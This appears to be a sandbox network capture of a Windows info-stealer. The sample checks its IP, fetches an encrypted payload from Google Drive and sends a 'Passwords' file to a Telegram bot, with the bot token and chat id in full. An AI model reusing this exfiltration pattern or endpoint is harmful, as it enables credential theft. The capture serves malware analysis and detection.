Jan 10, 2025 21:54:45.616283894 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50063	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:46.739422083 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:47.417826891 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	50065	132.226.247.73	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:50.549308062 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:51.247606993 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49827	142.250.181.238	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:22 UTC	216	OUT	GET /uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 20:53:22 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 20:53:22 GMT Location: https://drive.usercontent.google.com/download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-Zuek_Fw6fQV2N59CGdezrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49835	172.217.18.97	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:23 UTC	258	OUT	GET /download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 20:53:26 UTC	4940	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC6bEjd3JBumUwENSNekZQKEL677JQlsXYigPghN5gdMT9jJwMAxpQ6Ns8IC9lNkfHnLaOuqXK0 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="OYNyGdSoiO100.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 94272 Last-Modified: Tue, 10 Dec 2024 23:21:23 GMT Date: Fri, 10 Jan 2025 20:53:26 GMT Expires: Fri, 10 Jan 2025 20:53:26 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=36f2NQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 20:53:26 UTC	4940	IN	Data Raw: 75 86 a6 eb 0b 7d 8f eb 4a 75 e2 f0 69 74 cd 18 92 b5 d3 54 1c 27 9a 70 38 3a 32 ce 9e 82 c3 46 fb 62 04 17 7c 83 72 6e 94 a8 cb 9d 57 4c 7f 82 25 37 b7 96 92 7d de f9 6f 8e 3f 58 78 32 47 fc 85 90 b5 b7 4f b7 09 b0 eb 06 53 58 a0 e6 22 1c 0f 44 79 ce dc aa 1f 13 97 11 25 38 59 d9 9e 37 9a fa 28 00 58 ce 13 76 b7 30 24 4c d9 f9 ac 10 34 23 98 57 03 83 e1 7a 2d 80 1e dc 95 8c cf e9 8e fd 65 7e 22 65 c0 6b 1f 85 0e 7f a3 e1 16 17 02 9e 0f 57 4b 05 af e9 72 10 81 4c 8b 02 8e a3 f4 36 bf 2d a2 ec 23 c7 53 d4 a3 60 fc c4 d4 5e f7 24 5d 52 ee bc d3 21 21 3c 48 d5 68 0a 1e 16 ff 91 35 d9 b0 64 3a bb 0d c7 6a 3f 35 49 11 3d 3b 33 a4 0f 72 e6 0b 68 05 78 c3 0a 7f a2 1b 2c d8 7a 3a 99 b3 81 1d 28 24 88 26 b4 f1 23 14 51 04 44 ed a7 ac 19 f5 f9 71 61 35 69 ea 3b 46 Data Ascii: u}JuitT'p8:2Fb\|rnWL%7}o?Xx2GOSX"Dy%8Y7(Xv0$L4#Wz-e~"ekWKrL6-#S`^$]R!!<Hh5d:j?5I=;3rhx,z:($&#QDqa5i;F
2025-01-10 20:53:26 UTC	4818	IN	Data Raw: 04 8d ef 2a 52 13 84 2c c0 4a c2 6a c3 5b f5 89 e9 0a bd 0c 37 05 fe 30 d0 89 4b cf eb 10 32 34 34 04 9d f3 1d f8 a6 02 47 06 c2 b6 f6 1c 7f fe dc db 13 92 06 a6 79 f2 87 52 8c 79 91 34 42 98 d0 76 89 f2 38 17 91 8c 22 22 81 a3 d5 59 31 37 3f d6 3f 8d c1 6f 67 14 10 5f 0e 77 aa c9 a5 5e a7 f2 0f 53 4d b1 ea a0 dd 63 3d 98 71 34 8b a8 ec b8 f6 fb 7a ad 3f 98 1b b4 bc d8 0f 58 9f 8c ef 5f e7 bb 18 52 4c 80 ca c6 1d 2e 97 4d a6 e0 98 e1 e5 89 a4 8a da b3 5a 09 cb a2 f5 67 d4 fe f4 46 e1 f8 f1 1c 22 d9 77 9a f9 b1 d8 3c 3a fe 72 26 35 a9 b9 53 48 c4 e9 1b ee c3 5c 3c 79 b6 25 a1 a2 76 e7 8a 09 76 15 58 60 61 41 7e 21 f9 e5 86 5f b7 aa 9e 21 11 d8 f6 0b 2e 56 98 8e 9a 86 02 42 ab 7f ef a7 3e 54 ad 1a 6f 29 6e c3 5d 0a 72 a6 54 85 95 d9 7a cb fe 2e 6f 25 12 10 Data Ascii: *R,Jj[70K244GyRy4Bv8""Y17??og_w^SMc=q4z?X_RL.MZgF"w<:r&5SH\<y%vvX`aA~!_!.VB>To)n]rTz.o%
2025-01-10 20:53:26 UTC	1323	IN	Data Raw: d8 75 40 1b a6 b6 30 01 07 6d 8e 2a 19 26 76 0e 25 c5 43 84 c4 22 81 46 21 18 13 94 6e 94 b8 ca de 46 7c 60 a8 03 a6 27 f2 95 f6 f3 20 34 9b 3d 55 30 bc ab fd ed cc 80 71 0e 94 ed f1 b6 0a ec 56 48 7f 8f e4 4b 8f a5 4d 7f 62 b7 14 ca 6a ea b3 30 26 26 b5 95 46 c8 74 c8 9a a2 47 5c 35 98 fc af fb 41 e4 5c a4 a4 e9 f3 c5 63 f0 81 18 5e 99 67 9a 5e 6e 7f a7 6b 0b 1f 05 59 65 bf ed 75 05 a0 ca c2 e2 71 b7 4c bd 02 b7 fc 03 42 5d 73 14 20 67 fd 44 79 ca f4 79 1f 13 dd 11 25 38 5b a2 d6 37 9a fe 56 53 58 ce 19 5e e3 30 24 46 d5 f1 bf 16 25 25 b4 5a 01 f8 a9 7a 2d 84 36 0f 15 8c c5 e9 80 e2 dd 0b 6e d1 c9 a2 40 6e 0f 33 64 e8 16 7f 6b e7 22 2e 2a 6d d9 9c 3f 70 a3 54 a6 6c e0 c8 a8 c5 dd 48 88 9e 56 a9 59 bd cd 5b 88 81 87 54 9b 4b 39 12 c0 b1 cf 2b 07 42 75 d5 Data Ascii: u@0m&v%C"F!nF\|`' 4=U0qVHKMbj0&&FtG\5A\c^g^nkYeuqLB]s gDyy%8[7VSX^0$F%%Zz-6n@n3dk".m?pTlHVY[TK9+Bu
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: ce 73 a0 44 b2 64 23 c0 23 26 85 fb 1c 35 2a e3 3e 17 c1 f6 42 8b 6c c4 1a 7e 5a 1f 92 82 10 f1 08 43 3a 5d ee 90 10 28 fa ca 21 00 43 52 89 09 d6 a9 6d 50 ca e5 fc f3 60 d0 c4 ff f2 9b e8 25 df 5f 76 ce 6e 8e 16 33 ba be 4d 02 32 01 29 cf b8 1a 56 11 b6 1f 6b f5 77 e9 f1 40 b5 d6 8a f8 b0 b5 61 93 9d 60 d2 ef cf 6c a8 cc 66 06 a6 cc 9b 0c 82 db 7f 8b e8 8d 5d 30 74 69 9d d3 d0 0a 57 e1 74 00 a4 94 11 7a aa 0f 05 6c fc bf 93 7d f1 d3 ba 4f 3c 2c 65 d4 56 d4 26 28 23 b6 f1 8c 83 2f 7a a7 08 47 37 a9 ad f9 46 8f 7b f7 c8 f6 3d 2e f7 a1 fc d9 c3 53 b8 4f bd 66 ef e2 86 f5 d9 73 28 57 7d 8d f0 64 36 d5 44 ff 1a da 8d 81 e0 6b 6e d5 05 81 83 24 a3 d8 92 8b 0f df 9e aa 89 e1 99 19 6f 1b d3 17 a7 d7 e6 86 2c 29 b3 ba 27 02 e7 ef 06 b6 0b 18 12 d7 5b 07 d4 68 43 Data Ascii: sDd##&5*>Bl~ZC:](!CRmP`%_vn3M2)Vkw@a`lf]0tiWtzl}O<,eV&(#/zG7F{=.SOfs(W}d6Dkn$o,)'[hC
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: 7b a4 cd de 9c ab fe b7 73 5d 7c 37 1d 57 15 1b 51 ed 9d 1f 3d 3d 2a 64 68 eb db d8 da 7f 28 26 7d db 75 f5 1e 6c 41 f2 4b c2 78 12 e2 68 23 90 54 37 d8 71 d3 2a 21 01 70 4c b9 e3 a5 5d 23 ae 69 be e5 ae 06 db 29 e0 5a 91 64 b3 42 0d e8 c1 9b fe ef db 67 98 91 8a d9 8d 74 71 3a 9d a5 92 73 6a 2b 8c 1c 06 c8 43 6f c7 d3 d9 00 9b de 5b ec 52 b3 ed 52 90 12 12 4b 7c a8 eb f0 54 74 19 03 ee b4 c9 70 c2 1b a1 3c b1 6a 9e 4b 05 5d a7 ad e8 6d 3a e2 c3 48 03 0e 1d 10 d7 a9 b4 73 28 f6 67 72 da 64 73 2c 54 0a 1b 15 93 00 0b cf 4a 0e 5e a2 be 33 f4 d5 78 92 59 ee 00 6c 3a e3 ac 53 4a e1 0d 83 9b cb 68 5d 32 8b 4f 66 23 a5 18 ac 13 66 03 f8 41 94 4e 46 0a ca 12 c7 60 70 48 00 6d e8 70 4c bd 50 11 08 04 9d 67 1f 92 f3 7e a9 74 e2 ed 1b 41 be f2 7d be 52 45 72 70 86 Data Ascii: {s]\|7WQ==dh(&}ulAKxh#T7q!pL]#i)ZdBgtq:sj+Co[RRK\|Ttp<jK]m:Hs(grds,TJ^3xYl:SJh]2Of#fANF`pHmpLPg~tA}RErp
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: 08 48 ce f3 87 15 34 35 92 7c 03 85 cb 7a 2d 9b 2e da 15 9e ce e9 80 d3 df 70 33 d1 cb d4 f6 26 0f 43 46 8e 42 7f 61 e6 39 aa 60 6a c8 9a 1f 7a 89 d7 ea 6c ea da 7e 17 d0 41 91 9b 47 ac 5f b4 d9 53 bc 8b bf a3 9a 4b 39 37 b2 53 c5 2b 75 22 3b 2c 68 0a 14 11 87 2e 35 d9 f6 4d c2 bb ba f7 0c 88 24 4f 7e c1 3b 33 ae 1c 9a cd 4a 78 06 16 ed 0a 7f ce 32 16 d8 72 30 8a ba 90 14 5c 67 0d 27 b5 e2 09 05 5b 6b 19 ec a7 a6 0a be e8 7a 52 39 78 e6 15 5f 5a 8e 20 15 63 53 55 64 ec 2a 19 fd a6 a1 2a cb eb e1 08 a6 75 7d 32 4a 68 d3 29 84 d1 24 f3 7c 39 9a 97 ea d6 cd 50 fe 84 18 4e 84 2a 99 90 70 ba d5 76 cc ac 66 36 aa 5c 6f 7a 80 d2 ee 2f 4b 5f 6c 0d 25 df f0 de b9 09 58 2f d5 87 4f 4c b5 a9 ec 8d 83 d8 7b 78 c1 f6 e8 b0 f2 eb 90 10 06 9d b9 a4 de d2 2f 45 ae 45 2d Data Ascii: H45\|z-.p3&CFBa9`jzl~AG_SK97S+u";,h.5M$O~;3Jx2r0\g'[kzR9x_Z cSUd*u}2Jh)$\|9PNpvf6\oz/K_l%X/OL{x/EE-
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: 27 36 88 30 07 ad 31 be 37 b2 24 d9 d4 5b 49 a3 77 02 20 1c 1c ae a0 78 b8 63 9d a1 2d 72 90 d9 81 da ec e9 64 b8 23 c2 c8 0a 93 f1 da 73 fb 67 05 b9 19 75 4f 29 38 01 ee b2 00 ee e1 97 3c 8c 88 54 2a 4e 25 df 43 28 54 9d db ae 1f 1b 80 f0 56 77 28 81 64 5f e6 84 db 86 94 56 3d e4 28 41 2d 4a fd b2 18 4e 18 8f 0e d5 60 09 8d 89 63 9f bf 74 ab 30 71 73 2d d6 28 8e d2 20 6a 3b 14 33 17 28 92 8b c5 b8 d8 72 cf 1f 45 6f c8 83 c1 0d 50 b5 0a d6 bc 30 25 a1 ea 6c cd 36 9b ab 41 4c 0b 26 fa 6c bb 24 cd 13 8d 35 f1 fd 35 d5 52 62 a1 17 e2 56 3e f0 b9 c0 5b 4f 12 e4 d9 38 84 1d 48 ba 0a 9a 9a 1d 64 a5 c6 37 32 13 bd a8 c1 a5 d1 c7 d9 b5 4b 60 29 d2 ba 17 ff 3e be 14 28 89 80 cc 55 8c f3 23 3b 28 35 9c c6 de d9 e7 eb 82 ad 61 d6 87 1c 4c e5 5d 03 bb 4b 5a 1e 87 a8 Data Ascii: '6017$[Iw xc-rd#sguO)8<T*N%C(TVw(d_V=(A-JN`ct0qs-( j;3(rEoP0%l6AL&l$55RbV>[O8Hd72K`)>(U#;(5aL]KZ
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: ac 6f f4 d3 fa a3 bb f4 1e a5 63 5c 48 41 02 27 19 31 cb ec 2d b9 9e ac fa f9 6b a2 be ef 7b b8 50 49 43 80 01 ea aa 03 9b d4 20 a8 a7 ac 6f 83 b9 b8 4d 94 0c b2 1d fd 05 9b f7 96 c4 ca 4f a1 b6 3e e8 f5 29 5b ed 92 f8 9f 83 3c 4e 39 e8 84 d4 9a cf d3 e4 8e 8e 5e 5f 03 ff 79 3b 5b 6b fd f1 4e 23 ab 8f 9c 5b ff 83 c8 d9 cb 0c 31 1c fb 4e d3 8d 39 29 c6 9b 42 22 16 85 43 ff 17 e7 74 06 5f 6c b1 54 f3 16 0f 34 2a 49 36 ba 3f b0 87 fb cb 45 80 40 cf 18 0f 8f 80 5e 8b f2 39 32 87 fe ba 2e 81 d3 73 0e 70 35 9d 83 31 d7 6c 7a 67 6e a4 84 16 75 ab 7a 85 7d ce b5 1a 53 3d 60 43 bb cc 6c 8c bb 7c 40 db 96 ec c8 50 a0 57 ad 3f 98 67 37 c2 d7 05 58 8a 9b 8d f8 a9 bb 12 26 ed 8f ca c2 76 be 97 5c ab f7 5f f4 ca 09 a3 9b d6 ff ca fc 34 2d dd 51 0a ee d7 01 ef f8 f1 1c Data Ascii: oc\HA'1-k{PIC oMO>)[<N9^_y;[kN#[1N9)B"Ct_lT4*I6?E@^92.sp51lzgnuz}S=`Cl\|@PW?g7X&v\_4-Q
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: cc 73 93 01 09 ef 5b b0 d9 b6 2f 45 c8 45 2d 26 a0 2e 6a 28 e3 9a 9e 8b 7c 7b e2 a8 6e c7 c9 ca e5 a5 6f af c5 69 7e f1 9b 60 5d 9f a8 96 3a 61 df ad a2 f8 4e 59 ad 99 24 d2 bc 1d 19 d6 c9 12 cd 4c 2b 05 9b 59 ae 15 fb 02 92 9b 75 ca 6b bc 13 51 6a d1 eb a9 b1 a8 85 0e a2 c4 c1 3e 86 73 f7 a1 98 1c fe 98 0c ca 55 e4 60 7d bd 0f fc 7d 9c b1 d9 4f 26 a2 3b 15 a4 f7 32 4d 78 e5 45 a8 8b 38 7d dd bc eb 06 3b 47 a4 4e 60 5d 5e a9 6a 86 0e 4a 75 e3 d6 5d 57 6b 03 0b 3f 7e 41 2b 66 4a bd 00 c7 61 ad 1b 0c 13 47 a3 75 e6 32 a3 b4 cc c9 24 aa e4 4d 3f d2 78 1c c3 29 2a c6 59 00 22 91 de 88 b9 81 2a 3f 53 e0 9b 63 5b 72 7c 58 98 64 88 b5 1f cb ac 0e a5 c5 fd 3a ee 14 eb 0b ab c2 01 da 59 06 9b bc 0f 79 04 db f3 2c 8b 4b 07 9f 5a 7f 7a 9f 03 4e be 51 b3 70 65 dc 9b Data Ascii: s[/EE-&.j(\|{noi~`]:aNY$L+YukQj>sU`}}O&;2MxE8};GN`]^jJu]Wk?~A+fJaGu2$M?x)Y"?Sc[r\|Xd:Yy,KZzNQpe
2025-01-10 20:53:26 UTC	1390	IN	Data Raw: b0 64 fe c4 18 3e 0d 86 03 cb 77 33 83 87 a8 b4 8b 55 79 55 0b 0a bf 12 02 6c 26 b0 0c da 1a c7 ad c8 44 b9 38 c0 27 1f c4 6c 2d 93 51 e6 3b 9e 54 74 1c 3d b8 b2 6e 55 3f 74 6e 85 5d 37 47 61 ba 0f 28 3d 3a 57 8f 59 df 2c bc 78 db 84 7c a1 1f fa 46 24 b1 e8 f5 9a 7a 39 0c 98 13 19 3a 27 56 89 a4 6b 51 ae ff 0a 7c 88 84 8d bc b5 8c 53 a9 08 6e 9f 71 4a db 7a aa 6e 76 e4 c9 a5 bf 1f 59 65 05 60 27 bf e1 d4 a4 42 32 ff 23 ec b4 2d d9 66 46 13 71 13 13 4b 50 62 56 3c 09 08 f7 b0 0e 32 da 64 47 71 e8 9e a3 05 2f ba 9d 22 02 53 10 4d 23 e9 45 93 c6 53 a4 42 20 1c 1b 80 20 95 b8 c4 de 00 7c 60 a4 10 ad 33 75 e8 75 bf 33 3e 8e 35 41 b5 f0 b8 f6 f8 ef 7d 67 26 34 90 bd bc 1b ed 39 17 55 8f ee 5a 95 bd da 7f f8 b1 07 cf 4e ea b3 0a 06 24 e6 79 46 c8 7a be d8 a5 35 Data Ascii: d>w3UyUl&D8'l-Q;Tt=nU?tn]7Ga(=:WY,x\|F$z9:'VkQ\|SnqJznvYe`'B2#-fFqKPbV<2dGq/"SM#ESB \|`3uu3>5A}g&49UZN$yFz5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49871	104.21.16.1	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 20:53:29 UTC	871	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1857198 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQMuZ%2Bm%2BNjQ5AZiYMD7TWeIZAjV1DJLh8DcC%2B1E%2FAUmsWoGOgjkS4QCY8K1Aa9nRQ9ceg%2BVDVmAd9SV7qG9RkuA%2B%2FRAOYjLRuzr%2BQWoVEO3ARKR5pwXdqUQPcHcK%2FZ%2BgZ479v%2Bd2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff8e8a0c9d1899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1632&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=153&unsent_bytes=0&cid=f81fb455e0ff5de8&ts=167&x=0"
2025-01-10 20:53:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49912	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:35 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd318ef030315c Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:35 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 65 66 30 33 30 33 31 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd318ef030315cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:35 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
